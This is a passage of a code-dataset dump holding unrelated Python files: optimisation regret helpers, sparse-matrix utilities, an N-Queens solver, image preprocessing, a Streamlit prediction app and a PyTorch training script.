get_weighted_predictors(regressor, c_train, X_train,weights=None, random_regr=False):\n [d,n_train] = c_train.shape\n predictors = {}\n for d_ in range(d): \n \t# If random: fix random state for refitting\n if random_regr: \n \tregr = regressor(random_state=1)\n else: \n \tregr = regressor()\n if weights is not None: \n \tregr.fit(X_train.T, c_train[d_,:], sample_weight=weights[d_,:])\n else: \n \tregr.fit(X_train.T, c_train[d_,:])\n predictors[d_] = regr\n return predictors\n\ndef get_regret(predictors,X_train, c_train, X_test, c_test, sp_oracle, quiet=False):\n [d,n_train] = c_train.shape\n c_pred = np.asarray([ predictors[d_].predict(X_train.T) for d_ in range(d)])\n regrets = np.zeros(n_train);x_star_regr = np.zeros(c_pred.shape)\n for i in range(n_train): \n if not quiet: \n if i%500==0: print(i)\n [r_star,x_star] = sp_oracle(c_train[:,i])\n [r_pred,x_pred] = sp_oracle(c_pred[:,i])\n regrets[i] = r_star-r_pred; x_star_regr[:,i]=x_star-x_pred\n return [regrets, x_star_regr]\n\ndef get_regret_instanceDict(predictors, instances, sp_oracle, quiet=False):\n [d,n_train] = c_train.shape\n c_pred = np.asarray([ predictors[d_].predict(X_train.T) for d_ in range(d)])\n regrets = np.zeros(n_train);x_star_regr = np.zeros(c_pred.shape)\n for inst in instances: \n if not quiet: \n if i%500==0: print(i)\n #[r_star,x_star] = sp_oracle(c_train[:,i])\n [r_pred,x_pred] = sp_oracle(c_pred[:,i])\n regrets[i] = instance['opt_val']- instance['c'] @ x_pred; x_star_regr[:,i]=instance['opt_sol']-x_pred\n return [regrets, x_star_regr]\n\ndef get_regret2(predictors,X_train, c_train, X_test, c_test, sp_oracle, quiet=False):\n [d,n_train] = c_train.shape\n c_pred = np.asarray([ predictors[d_].predict(X_train.T) for d_ in range(d)])\n regrets = 
np.zeros(n_train);x_star_regr = np.zeros(c_pred.shape)\n for i in range(n_train): \n if not quiet: \n if i%500==0: print(i)\n [r_star,x_star] = sp_oracle(c_train[:,i])\n [r_pred,x_pred] = sp_oracle(c_pred[:,i])\n regrets[i] = r_star-r_pred; x_star_regr[:,i]=abs(r_star-r_pred)*np.ones(x_star.shape)\n return [regrets, x_star_regr]\n\ndef eval_regr(c_hat,c_star, oracle): \n # oracle doesn't serialize for parallelization: need to chanage \n [r_star,x_star] = oracle(c_star)\n [r_pred,x_pred] = oracle(c_hat)\n return r_star-r_pred,x_star-x_pred\n\ndef generate_data(n_train, n_test, n_holdout, polykernel_degree,polykernel_noise_half_width,B_true,gen_test=True):\n ''' return X, which is p x N \n '''\n (X_train, c_train) = generate_poly_kernel_data_simple(B_true, n_train, polykernel_degree, polykernel_noise_half_width)\n (X_validation, c_validation) = generate_poly_kernel_data_simple(B_true, n_holdout, polykernel_degree, polykernel_noise_half_width)\n if gen_test: \n (X_test, c_test) = generate_poly_kernel_data_simple(B_true, n_test, polykernel_degree, polykernel_noise_half_width)\n X_test = vcat(ones(1,n_test), X_test)\n # Add intercept in the first row of X\n # X is p x N \n X_train = vcat(ones(1,n_train), X_train); X_validation = vcat(ones(1,n_holdout), X_validation); \n if gen_test: \n \treturn [X_train, c_train,X_validation, c_validation,X_test, c_test]\n else:\n \treturn [X_train, c_train,X_validation, c_validation]\n\n\n\n","repo_name":"angelamzhou/opt-milp-taskloss","sub_path":"deprecated/opt_w_predictions.py","file_name":"opt_w_predictions.py","file_ext":"py","file_size_in_byte":6417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2976193250","text":"import os\nimport sys\nimport numpy as np\nimport scipy.sparse as sp\nfrom scipy.sparse import csr_matrix\nimport xclib\nimport xclib.evaluation.xc_metrics as xc_metrics\nimport xclib.data.data_utils as data_utils\nimport pandas as pd\nfrom tabulate import tabulate\nfrom io import StringIO\nfrom tqdm import tqdm\n\nclass CaptureIO(list):\n def __enter__(self):\n self._stdout = sys.stdout\n sys.stdout = self._stringio = StringIO()\n return self\n def __exit__(self, *args):\n self.append(''.join(self._stringio.getvalue()))\n del self._stringio # free up some memory\n sys.stdout = self._stdout\n\ndef write_sparse_mat(X, filename, header=True):\n if not isinstance(X, csr_matrix):\n X = X.tocsr()\n X.sort_indices()\n with open(filename, 'w') as f:\n if header:\n print(\"%d %d\" % (X.shape[0], X.shape[1]), file=f)\n for y in X:\n idx = y.__dict__['indices']\n val = y.__dict__['data']\n sentence = ' '.join(['%d:%.5f'%(x, v)\n for x, v in zip(idx, val)])\n print(sentence, file=f)\n \ndef read_sparse_mat(filename, use_xclib=True):\n if use_xclib:\n return xclib.data.data_utils.read_sparse_file(filename)\n else:\n with open(filename) as f:\n nr, nc = map(int, f.readline().split(' '))\n data = []; indices = []; indptr = [0]\n for line in tqdm(f):\n if len(line) > 1:\n row = [x.split(':') for x in line.split()]\n tempindices, tempdata = list(zip(*row))\n indices.extend(list(map(int, tempindices)))\n data.extend(list(map(float, tempdata)))\n indptr.append(indptr[-1]+len(tempdata))\n else:\n indptr.append(indptr[-1])\n score_mat = csr_matrix((data, indices, indptr), (nr, nc))\n del data, indices, indptr\n return score_mat\n\nsize_dict = {bool : 1, np.int32 : 4, np.float32 : 4, np.int64 : 8}\n\ndef readbuf(buf, dtype, offset=0, count=1):\n val = np.frombuffer(buf, offset=offset, dtype=dtype, 
count=count)\n if count == 1: val = val[0]\n offset += size_dict[dtype]*count\n return val, offset\n\ndef read_buf_bin_vecif(buf, dtype, offset = 0, totlen = -1):\n if totlen < 0: totlen, offset = readbuf(buf, np.int64, offset, 1)\n totlen *= 2\n \n temp, _ = readbuf(buf, np.int32, offset, totlen)\n inds = temp.reshape(-1, 2)[:, 0];\n temp, offset = readbuf(buf, dtype, offset, totlen)\n data = temp.reshape(-1, 2)[:, 1];\n \n nr = 1\n if inds.shape[0] > 0: nr = inds.max()+1\n return csr_matrix((data, inds, [0, len(data)]), (1, nr)), offset\n\ndef read_buf_bin_vec(buf, dtype, offset = 0, totlen = -1):\n if totlen < 0: totlen, offset = readbuf(buf, np.int64, offset, 1)\n return readbuf(buf, dtype, offset, totlen)\n\ndef read_buf_bin_spmat(buf, dtype, offset = 0, old = False):\n (nr, nc), offset = readbuf(buf, np.int32, offset, 2)\n \n size = None\n if old: size, offset = read_buf_bin_vec(buf, np.int32, offset, nr)\n else: size, offset = read_buf_bin_vec(buf, np.int32, offset)\n\n data = []; inds = []; indptr = np.zeros(nr+1, int)\n indptr[1:] = size.cumsum()\n totlen = indptr[-1]\n temp, offset = read_buf_bin_vecif(buf, dtype, offset, totlen)\n\n return csr_matrix((temp.data, temp.indices, indptr), (nr, nc)), offset\n\ndef read_bin_spmat(fname, old = False):\n buf = open(fname, 'rb').read()\n print('loaded bin file in buffer')\n spmat, _ = read_buf_bin_spmat(buf, np.float32, 0, old)\n return spmat\n\nclass bcolors:\n purple = '\\033[95m'\n blue = '\\033[94m'\n green = '\\033[92m'\n warn = '\\033[93m' # dark yellow\n fail = '\\033[91m' # dark red\n white = '\\033[37m'\n yellow = '\\033[33m'\n red = '\\033[31m'\n \n ENDC = '\\033[0m'\n bold = '\\033[1m'\n underline = '\\033[4m'\n reverse = '\\033[7m'\n \n on_grey = '\\033[40m'\n on_yellow = '\\033[43m'\n on_red = '\\033[41m'\n on_blue = '\\033[44m'\n on_green = '\\033[42m'\n on_magenta = '\\033[45m'\n \ndef _c(*args, attr='bold'):\n string = ''.join([bcolors.__dict__[a] for a in attr.split()])\n string += ' '.join([str(arg) for arg in args])+bcolors.ENDC\n return string\n\ndef printacc(score_mat, K = 5, X_Y = None, disp = True, inv_prop_ = -1):\n if X_Y is None: X_Y = tst_X_Y\n if inv_prop_ is -1 : inv_prop_ = inv_prop\n \n acc = xc_metrics.Metrics(X_Y.tocsr().astype(np.bool), inv_prop_)\n metrics = np.array(acc.eval(score_mat, K))*100\n df = pd.DataFrame(metrics)\n \n if inv_prop_ is None : df.index = ['P', 'nDCG']\n else : df.index = ['P', 'nDCG', 'PSP', 'PSnDCG']\n \n df.columns = [str(i+1) for i in range(K)]\n if disp: print(tabulate(df.round(2), [\"metric\", *[str(i+1) for i in range(K)]], tablefmt=\"pretty\"))\n return metrics","repo_name":"nilesh2797/zestxml","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4887,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} +{"seq_id":"21495578946","text":"from sys import stdin\r\n\r\nn, money = map(int, stdin.readline().split())\r\ngraph = [int(stdin.readline()) for _ in range(n)]\r\nfloor = graph[0]\r\nceiling = graph[0]\r\n\r\nfor i in range(1, n):\r\n if ceiling > graph[i]:\r\n s = money // floor\r\n money -= (floor * s)\r\n money += (ceiling * s)\r\n floor = ceiling\r\n ceiling = 0\r\n elif ceiling < graph[i]:\r\n ceiling = graph[i]\r\n\r\n if floor > graph[i]:\r\n floor = graph[i]\r\n\r\nif floor < ceiling:\r\n s = money // floor\r\n money -= (floor * s)\r\n money += (ceiling * s)\r\n\r\nprint(money)","repo_name":"youngeun10/baekjoon","sub_path":"백준/Silver/17521. 
Byte Coin/Byte Coin.py","file_name":"Byte Coin.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25863194759","text":"# Author : Zhixin.Ji\n# Date : 2019-12-07\n# Description : 命令行参数解析\nimport argparse\n\nbcmd = False\nauthor = ''\nluckey_number = 0\n\nparser = argparse.ArgumentParser(description='命令行参数分析')\nparser.add_argument(\n # 参数名,'-'/'--'前缀表示可选参数,默认变量名是'--'后面的字符串\n '-c', '--b_run_by_cmd',\n # 参数类型,int,float,str,bool等\n # type=bool,\n # 参数储存方式,默认为'store'\n # 'store_true'表示如果有这个参数,就储存为True,且type参数不能赋值\n action='store_true',\n default=False,\n dest='bcmd', # 储存的参数名,默认'--'后面的字符串\n help='是否以命令行启动')\nparser.add_argument('-a', '--author',\n default='未知作者')\nparser.add_argument('-l', '--luckey_number',\n type=int)\n\n# 命令行传参的方式\n# -c\n# 效果: args.bcmd=True, 仅适用于action='store_true'\n# -a sola\n# 效果: args.author=sola\n# -l=2\n# 效果: args.luckey_number=2\n\nargs = parser.parse_args()\nprint(args)\n\nprint('初始值')\nprint('bcmd: ', bcmd)\nprint('author: ', author)\nprint('luckey_number: ', luckey_number)\n\nbcmd = args.bcmd\nauthor = args.author\nluckey_number = args.luckey_number\nprint('显式赋值后')\nprint('bcmd: ', bcmd)\nprint('author: ', author)\nprint('luckey_number: ', luckey_number)\n","repo_name":"solairewrite/PythonTool","sub_path":"py/Demos/cmd_args.py","file_name":"cmd_args.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11816679185","text":"import os\r\nimport cv2\r\nimport numpy as np\r\n\r\n\r\ndef get_xy(img):\r\n '''获取鼠标点击处的坐标值'''\r\n def getpos(event,x,y,flags,param):\r\n if event ==cv2.EVENT_LBUTTONDOWN: #定义一个鼠标左键点击事件\r\n print((x,y),' ',img[y,x])\r\n\r\n cv2.namedWindow('img',0)\r\n cv2.resizeWindow('img',1920,1080)\r\n cv2.imshow('img',img)\r\n cv2.setMouseCallback('img',getpos)\r\n cv2.waitKey(0)\r\n\r\n\r\nif __name__ == '__main__':\r\n # img = cv2.imread(r'./image/009.jpg')\r\n dir = r'../../696'\r\n for name in os.listdir(dir):\r\n img = cv2.imread(os.path.join(dir,name))\r\n get_xy(img)","repo_name":"Yi196/Python","sub_path":"OpenCV/获取像素坐标.py","file_name":"获取像素坐标.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27683673781","text":"\"\"\"\nDerived from: https://github.com/kratzert/finetune_alexnet_with_tensorflow/\n\"\"\"\n\nimport numpy as np\nimport cv2\n\nclass BatchPreprocessor(object):\n# shuffle 拖曳\n def __init__(self,dataset_file_path,num_classes,output_size=[224,224],horizontal_flip=False,shuffle=False,mean_color=[132.2766,139.6506,146.9702],multi_scale=None):\n self.num_classes=num_classes\n self.output_size=output_size\n self.horizontal_flip=horizontal_flip\n self.shuffle=shuffle\n self.mean_color=mean_color\n self.multi_scale=multi_scale\n\n self.pointer=0\n self.images=[]\n self.labels=[]\n\n # Read the dataset file\n dataset_file=open(dataset_file_path)\n # lines=dataset_file.readlines()\n for line in dataset_file.readlines():\n items=line.split()# The items be like :temp/images/image.jpg 0(The last number is labels number)\n self.images.append(items[0])\n self.labels.append(int(items[1]))\n\n # Shuffle the data \n if self.shuffle:\n self.shuffle_data()\n\n def shuffle_data(self):\n images=self.images[:]\n labels=self.labels[:]\n self.images=[]\n self.labels=[]\n\n # use the np.random.permutation to random the image file index\n 
idx=np.random.permutation(len(labels))\n for i in idx:\n self.images.append(images[i])\n self.labels.append(labels[i])\n\n def reset_pointer(self):\n self.pointer=0\n\n if self.shuffle:\n self.shuffle_data()\n\n def next_batch(self,batch_size):\n # Get next batch of image (path) and labels\n paths=self.images[self.pointer:(self.pointer+batch_size)]\n labels=self.labels[self.pointer:(self.pointer+batch_size)]\n\n # Update pointer\n self.pointer=self.pointer+batch_size\n\n # Read images(RGB)\n images=np.ndarray([batch_size,self.output_size[0],self.output_size[1],3])\n for i in range(len(paths)):\n img=cv2.imread(paths[i])\n\n # Flip image at random if flag is selected\n if self.horizontal_flip and np.random.random()<0.5:\n img=cv2.flip(img,1)\n\n if self.multi_scale is None:\n # Resize image for output\n img=cv2.resize(img,(self.output_size[0],self.output_size[0]))\n img=img.astype(np.float32)\n elif isinstance(self.multi_scale,list):# This function smilar to type ,but this function can check the whether it is subclass or not\n # Resize image for random scale\n new_size=np.random.randint(self.multi_scale[0],self.multi_scale[1],1)[0]# The randint final parameter is mean the size of the random number ,ex:np.random.randint(0,5,1)=4,and the [0] it mean take the np.array out to become the int \n img =cv2.resize(img,(new_size,new_size))\n img=img.astype(np.float32)\n\n # random crop at output size\n diff_size=new_size-self.output_size[0]\n random_offset_x=np.random.randint(0,diff_size,1)[0]\n random_offset_y=np.random.randint(0,diff_size,1)[0]\n img=img[random_offset_x:(random_offset_x+self.output_size[0]),random_offset_y:(random_offset_y+self.output_size)]\n\n # Subtract mean color\n img=img-np.array(self.mean_color)\n\n images[i]=img\n\n # Expand labels to one hot encoding\n one_hot_labels=np.zeros((batch_size,self.num_classes))\n for i in range(len(labels)):\n one_hot_labels[i][labels[i]]=1\n\n # Return array of images and labels\n return images,one_hot_labels\n\n","repo_name":"a8398331994/Deep-learning","sub_path":"examples/vggnet/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22317823054","text":"'''Attribute Association & Relationships'''\nimport streamlit as st\nimport altair as alt\nimport pandas as pd \nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport seaborn as sns\nfrom datetime import datetime\nfrom datetime import date\nfrom PIL import Image\nfrom altair import datum\nimport pickle\n\napptitle = 'Laundry Customer Profiling'\n\ndef app():\n st.markdown('# Predicting Dryer Number using RFC')\n\n # Importing the model and label encoder\n label_encoders = pickle.load(open('./models/le.pkl', 'rb'))\n load_rfc = pickle.load(open('./models/rfc.pkl', 'rb'))\n keys = label_encoders.keys()\n keys = list(keys)\n\n # Declaring input fields\n age_group = st.selectbox('Age Group', ('(25, 30]', '(30, 35]', '(50, 55]', '(45, 50]', '(40, 45]', '(35, 40]'))\n basket_colour = st.selectbox('Basket Colour', ('red', 'green', 'blue', 'black', 'white', 'pink', 'purple', 'yellow', 'brown', 'orange', 'grey', 'unknown'))\n day_of_week = st.selectbox('Day of Week', (0, 1, 2, 3, 4, 5, 6))\n kids_category = st.selectbox('Kids Category', ('young', 'no_kids', 'toddler', 'unknown', 'baby'))\n pants_colour = st.selectbox('Pants Colour', ('black', 'blue_jeans', 'yellow', 'white', 'brown', 'grey', 'orange', 'blue', 'green', 
'red', 'purple', 'unknown', 'pink'))\n part_of_day = st.selectbox('Part of Day', ('Evening', 'Night', 'Late Night', 'Early Morning', 'Morning', 'Afternoon'))\n race = st.selectbox('Race', ('malay', 'indian', 'unknown', 'chinese', 'foreigner'))\n shirt_colour = st.selectbox('Shirt Colour', ('blue', 'white', 'red', 'black', 'brown', 'yellow', 'grey', 'orange', 'green', 'purple', 'pink', 'unknown'))\n washer_no = st.selectbox('Washer Number', (3, 6, 4, 5))\n wash_item = st.selectbox('Wash Item', ('clothes', 'unknown', 'blankets'))\n\n\n age_group_stuff = {'(25, 30]': 0, '(30, 35]': 1, '(50, 55]': 2, '(45, 50]': 3, '(40, 45]': 4, '(35, 40]': 5}\n age_group_res = age_group_stuff.get(age_group)\n basket_colour_res = label_encoders['BASKET_COLOUR'].transform([basket_colour])[0]\n day_of_week_res = label_encoders['DAY_OF_WEEK'].transform([day_of_week])[0]\n kids_category_res = label_encoders['KIDS_CATEGORY'].transform([kids_category])[0]\n pants_colour_res = label_encoders['PANTS_COLOUR'].transform([pants_colour])[0]\n part_of_day_res = label_encoders['PART_OF_DAY'].transform([part_of_day])[0]\n race_res = label_encoders['RACE'].transform([race])[0]\n shirt_colour_res = label_encoders['SHIRT_COLOUR'].transform([shirt_colour])[0]\n washer_no_res = label_encoders['WASHER_NO'].transform([washer_no])[0]\n wash_item_res = label_encoders['WASH_ITEM'].transform([wash_item])[0]\n\n predictinputs = [age_group_res, basket_colour_res, day_of_week_res, kids_category_res, pants_colour_res, part_of_day_res, race_res, shirt_colour_res, washer_no_res, wash_item_res]\n prediction = load_rfc.predict([predictinputs])[0]\n prediction_proba = load_rfc.predict_proba([predictinputs])[0]\n prediction = label_encoders['DRYER_NO'].inverse_transform([prediction])[0]\n\n st.info(f\"The predicted dryer is dryer number {prediction}\")\n st.success(f\"\"\"\n The prediction probability for dryer number 7 is : {prediction_proba[0]}\\n\n The prediction probability for dryer number 8 is : {prediction_proba[1]}\\n\n The prediction probability for dryer number 9 is : {prediction_proba[2]}\\n\n The prediction probability for dryer number 10 is : {prediction_proba[3]}\\n\n \"\"\")","repo_name":"TheCornelius/laundryblues","sub_path":"apps/washerclass.py","file_name":"washerclass.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43399557620","text":"#\n# @lc app=leetcode id=51 lang=python3\n#\n# [51] N-Queens\n#\n\n# @lc code=start\nfrom typing import List\n\n## 回溯:对每一行,每个有效可填的位置,填'Q', 直到走完所有行,结果加入结果集,回溯回来,继续下一个试探\nclass Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n res = []\n queen = [['.'] * n for i in range(n)]\n def queen2Str(queen):\n l = []\n for row in queen:\n l.append(''.join(row))\n return l\n\n def isValid(queen, row, col):\n for i in range(row):\n for j in range(n):\n if queen[i][j] == 'Q' and ( j == col or abs(i - row) == abs(j - col)):\n return False\n return True\n\n def backtrack(queen, row):\n if row == n:\n res.append(queen2Str(queen))\n return\n for col in range(n):\n if isValid(queen, row, col):\n queen[row][col] = 'Q'\n backtrack(queen, row + 1)\n queen[row][col] = '.'\n backtrack(queen, 0)\n return res\n\ninput = 4\nprint(Solution().solveNQueens(4)) \n \n# @lc 
code=end\n\n","repo_name":"CharmSun/my-leetcode","sub_path":"py/51.n-queens.py","file_name":"51.n-queens.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71711711201","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport torch as T\ndevice = T.device(\"cpu\")\nfrom sklearn import preprocessing\n\n\ndef divide_and_extract(arr):\n arr = np.array(arr)\n first_col = arr[:, 0]\n second_col = arr[:, 1]\n third_col = arr[:, 2]\n return np.column_stack((second_col / first_col, third_col))\n\ndef multipy(arr, col1, col2):\n arr = np.array(arr)\n first_col = arr[:, col1]\n second_col = arr[:, col2]\n return first_col*second_col\n\ndef divide(arr, col1, col2):\n arr = np.array(arr)\n first_col = arr[:, col1]\n second_col = arr[:, col2]\n return first_col/second_col\n\ndef add(arr, col1, col2):\n arr = np.array(arr)\n first_col = arr[:, col1]\n second_col = arr[:, col2]\n return first_col+second_col\n\n# -----------------------------------------------------------\n\nclass Samples_Dataset(T.utils.data.Dataset):\n def __init__(self, features_file, targets_file):\n self.features = T.load(features_file).to(device) # rate coefficients\n self.targets = T.tensor(np.load(targets_file), dtype=T.float64\n ).to(device) # densities\n\n # choose number of wanted samples (max 500)\n nsamples = 15\n # get size of last dimension\n size = np.shape(self.features)[-1]\n self.features = self.features[:nsamples,:,:].reshape(-1, size)\n\n tmp_coeff = self.features.detach().numpy()\n\n func1 = multipy(tmp_coeff, col1 = 0, col2 = 1)\n func2 = divide(tmp_coeff, col1 = 0, col2 = 1)\n func3 = add(tmp_coeff, col1 = 0, col2 = 1) \n\n tmp_coeff = np.column_stack((func1,func2, func3, tmp_coeff))\n # Transform back to tensor \n self.features = T.tensor(tmp_coeff, dtype=T.float64).to(device)\n\n # repeat the targets array nsamples times\n self.targets = T.tile(self.targets, (nsamples, 1)).to(device)\n\n \n def __len__(self):\n return len(self.features)\n \n def __getitem__(self, index):\n x = self.features[index] # rate coeff\n y = self.targets[index]\n return x, y\n\n# -----------------------------------------------------------\nclass LoadDataset(T.utils.data.Dataset):\n\n def __init__(self, src_file, nspecies, react_idx = None, m_rows=None, columns= None):\n all_xy = np.loadtxt(src_file, max_rows=m_rows,\n usecols=columns, delimiter=\" \",\n # usecols=range(0,9), delimiter=\"\\t\", delimter= any whitespace by default\n comments=\"#\", skiprows=0, dtype=np.float64)\n\n self.scaler = preprocessing.MinMaxScaler()\n self.scaler_max_abs = preprocessing.MaxAbsScaler() \n\n ncolumns = len(all_xy[0])\n x_columns = np.arange(ncolumns-nspecies,ncolumns,1)\n y_columns = react_idx\n if react_idx == None:\n y_columns = np.arange(0,ncolumns-nspecies,1)\n\n tmp_x = all_xy[:,x_columns] # species\n tmp_y = all_xy[:,y_columns] # rate coefficients\n\n # tmp_y = divide_and_extract(tmp_y) # k2/k1\n\n func1 = multipy(tmp_y, col1 = 0, col2 = 1)\n func2 = divide(tmp_y, col1 = 0, col2 = 1)\n func3 = add(tmp_y, col1 = 0, col2 = 1)\n\n stack = np.column_stack((func1,func2, func3, tmp_y))\n tmp_y = stack\n\n # Normalize data\n self.scaler.fit(tmp_y) \n tmp_y = self.scaler.transform(tmp_y)\n\n self.scaler_max_abs.fit(tmp_x) \n tmp_x = self.scaler_max_abs.transform(tmp_x)\n # print(tmp_y, np.shape(tmp_y))\n\n # Change this back again \n self.x_data = T.tensor(tmp_y, \\\n dtype=T.float64).to(device)\n self.y_data = 
T.tensor(tmp_x, \\\n dtype=T.float64).to(device)\n self.all_data = T.tensor(all_xy, \\\n dtype=T.float64).to(device)\n\n\n def __len__(self):\n return len(self.x_data)\n \n def __getitem__(self, idx):\n densities = self.x_data[idx,:] # or just [idx]\n coef = self.y_data[idx,:] \n return (densities, coef) # tuple of two matrices \n\n# ------------------------------------------------------------------------------\n\nclass SparseLayer(T.nn.Module):\n def __init__(self, input_size, output_size, connectivity) -> None:\n super(SparseLayer, self).__init__()\n self.in_size = input_size\n self.out_size = output_size\n self.connectivity = connectivity\n self.weight = T.nn.Parameter(T.randn(input_size, output_size))\n \n def forward(self, x):\n # apply sparse connectivity pattern to weight matrix\n x = T.matmul(x, self.weight*self.connectivity) #include .t()?\n return x\n\n# ------------------------------------------------------------------------------\n\nclass Full_ROM(T.nn.Module):\n def __init__(self, input_size, hidden_size):\n super(Full_ROM, self).__init__()\n\n self.connectivity = T.eye(input_size)\n\n self.LinearRegression = SparseLayer(input_size, input_size, self.connectivity)\n \n # set weights outside the diagonal to zero (apply mask)\n self.LinearRegression.weight.data *= self.connectivity\n\n \n self.decoder = T.nn.Sequential(\n T.nn.Linear(input_size, hidden_size),\n T.nn.Tanh(),\n T.nn.Linear(hidden_size, hidden_size),\n T.nn.Tanh(),\n T.nn.Linear(hidden_size, 3),\n )\n\n def forward(self, x):\n encoded = self.LinearRegression(x)\n decoded = self.decoder(encoded)\n return decoded\n\n# ------------------------------------------------------------------------------\n\nclass MyPlots():\n def __init__(self):\n self.epoch_list = []\n self.epoch_loss_list = []\n self.val_loss_list = []\n self.epoch_loss_list_loki = []\n \n def configure(self):\n A = 5 # We want figures to be A5\n plt.figure(figsize=(46.82 * .5**(.5 * A), 33.11 * .5**(.5 * A)))\n\n matplotlib.rc('xtick', labelsize=15) \n matplotlib.rc('ytick', labelsize=15)\n matplotlib.rcParams.update({'font.size': 20}) \n\n def plot_loss_curves(self):\n plt.plot(self.epoch_list, self.epoch_loss_list, '-o', label = 'Loss MSE + L1')\n # plt.plot(self.epoch_list, self.epoch_loss_list_loki, '-o', label = 'LoKI')\n plt.plot(self.epoch_list, self.val_loss_list, '-o', label = 'validation')\n plt.xlabel('epoch')\n plt.ylabel('loss')\n plt.legend()\n plt.savefig('Images\\\\Full_ROM_model\\\\loss_curve.png')\n \n def plot_predict_target(self, predict, target, sort_by_target= False):\n npoints = len(predict)\n x_ = np.arange(0,npoints,1)\n a = target # target\n b = predict # predicted\n ab = np.stack((a,b), axis=-1)\n sorted_ab = ab[ab[:,0].argsort()]\n if (not sort_by_target):\n sorted_ab = ab\n plt.plot(x_, sorted_ab[:,1], 'ro', label='predicted')\n plt.plot(x_, sorted_ab[:,0], 'bo', label= 'target')\n plt.legend()\n\n\n\n#----------------------------------------------------------------------------------------\n\n# Compute norm of network weights\ndef param_norm():\n total_norm = 0\n parameters = [p for p in model.parameters() if p.grad is not None and p.requires_grad]\n for p in parameters:\n param_norm = p.grad.detach().data.norm(2)\n total_norm += param_norm.item() ** 2\n total_norm = total_norm ** 0.5\n return total_norm\n\n#-------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n T.manual_seed(8) # recover reproducibility\n\n # 1. 
Load training dataset \n src_file = 'data\\\\datapointsk1k2k3_3k.txt' \n species = ['O2(X)', 'O2(a)', 'O(3P)']\n k_columns = [0,1,2] # Set to None to read all reactions/columns in the file\n full_dataset = LoadDataset(src_file, nspecies= len(species), react_idx= k_columns) #(data already scaled)\n nfunctions = 6\n\n dir_path = \"Images\\\\statistics\\\\stacks\\\\500_samples\\\\\"\n samples_dataset = Samples_Dataset(features_file=dir_path+\"stack_train.pt\",\n targets_file=dir_path+\"densities_targets_train.npy\")\n\n # 2. Create neural network\n model = Full_ROM(input_size= nfunctions, hidden_size= 10).to(device)\n model.to(T.double) # set model to float64\n\n # 3. Build training Model\n max_epochs = 200\n ep_log_interval =10\n lrn_rate = 0.01\n l1_coeff = 1e-4\n\n # 4. Choose loss and optimizer\n loss_func = T.nn.MSELoss()\n # loss_mse = T.nn.MSELoss()\n optimizer = T.optim.Adam(model.parameters(), lr=lrn_rate)#, weight_decay=1e-4)\n\n # Split into training and validation sets | samples_dataset -> full_dataset\n train_size = int(0.90 * len(full_dataset))\n test_size = len(full_dataset) - train_size\n train_dataset, val_dataset = T.utils.data.random_split(full_dataset, [train_size, test_size])\n\n # Create minibatch on training set\n bat_size= 20\n train_loader = T.utils.data.DataLoader(train_dataset,\n batch_size=bat_size, shuffle=True) # set to True\n \n # Extract x and y of validation set\n x_val = val_dataset[:][0]\n y_val = val_dataset[:][1]\n\n # Initialize data structures to store info\n myplot = MyPlots() \n\n # 5. Training algorithm\n print(\"Start training\\n\")\n for epoch in range(0, max_epochs):\n epoch_loss = 0 # for one full epoch\n\n model.train() # set mode\n\n for (batch_idx, batch) in enumerate(train_loader):\n (X_batch, Y_batch) = batch # (predictors, targets)\n optimizer.zero_grad() # prepare gradients\n oupt = model(X_batch) # predicted rate coefficient \n # print(np.shape(X_batch))\n # exit()\n loss_val_mse = loss_func(oupt, Y_batch)\n # Add L1 regularization to the first input layer \n loss_val = loss_val_mse #+ l1_loss\n l1_loss = T.tensor(0., requires_grad=True)\n # for param in model.LinearRegression.parameters():\n # l1_loss = l1_loss + T.norm(param, p=1) # p=1 is norm 1\n for name, param in model.named_parameters():\n # if 'bias' not in name:\n l1_loss = l1_loss + T.norm(param, 2)\n loss_val = loss_val_mse + l1_coeff * l1_loss\n epoch_loss += loss_val.item() # accumulate avgs\n loss_val.backward() # compute gradients\n optimizer.step() # update wts\n n_batches = batch_idx+1 # save number of batches\n\n #-------------------------------------------------------------\n # Print and save loss and errors\n if (epoch % ep_log_interval) == 0:\n myplot.epoch_list.append(epoch)\n myplot.epoch_loss_list.append(epoch_loss/n_batches)\n # myplot.epoch_loss_list_loki.append(loss_val_loki.item()/n_batches)\n\n model.eval() # (?)\n prediction = model(x_val)\n # print(np.shape(x_val))\n # exit()\n # loss_val = loss_func(prediction, y_val)\n loss_val = loss_func(prediction, y_val) #+ l1 loss\n myplot.val_loss_list.append(loss_val.item())\n\n print(\"epoch = %4d loss = %0.4f l1_loss= %0.4f validation_loss= %0.4f, param_norm = %0.4f\" % \\\n (epoch, epoch_loss/n_batches, l1_coeff*l1_loss, loss_val.item() ,param_norm()))\n #--------------------------------------------------------------\n\n print(\"Training complete \\n\")\n\n print(\"\\ntotal parameters' norm: \", param_norm())\n\n\n # Iterate through the model parameters and print out their values\n for name, param in 
